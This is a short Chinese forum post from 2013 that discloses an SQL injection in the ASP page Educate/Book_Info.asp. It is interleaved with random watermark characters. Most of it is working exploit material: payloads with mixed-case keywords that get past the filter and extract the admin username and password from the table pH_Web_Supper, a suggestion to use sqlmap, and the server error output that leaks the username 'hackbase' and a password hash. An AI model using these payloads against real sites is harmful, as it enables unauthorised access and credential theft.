漏洞出现在Educate/Book_Info.asp
+ o2 U" q% K2 B) G8 I0 e7 ~
: w1 l% T* P6 R& G4 R5 \ m( a. }6 t此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出 O( E5 Z6 Q' P1 e' C
# i8 O$ T* e5 z+ K9 P6 h# Rexp:如下
# f/ c& o6 F: b' A" G# M查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
3 i# R0 ?) M% H+ A! r! Q" x+ ]查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
9 ?# K0 {7 k5 O9 M; I \7 D0 e
. e2 }, x3 N2 F @6 H0 V5 R$ Hhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
5 p8 `% G8 S! T5 a2 [* a a ' Z: ?1 T4 g6 L" f* m
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'- @8 Y1 k: {! I: {
! S# [8 B. L" ]2 o
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
5 x$ H! c6 K; ?5 m% {2 f
9 Z2 V% M$ k; g- Z3 r/Educate/Book_Info.asp,行 85 r8 g1 ]/ n7 y% x& w O# j$ S9 G
- n" P0 w& s: v
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
: c, [* C' w3 N5 u l
8 {8 b! I% F3 k0 }Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
- B! {. L0 a! g5 D
8 m: x) b5 `8 a' Y2 b; b9 L' a2 E* T将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
5 p B3 w, B+ B1 x% M1 n 4 I6 f9 w. a9 P2 o, K
/Educate/Book_Info.asp,行 8+ x/ m9 X4 t" {
|
发表于 2013-2-16 21:44:16
收藏
支持
反对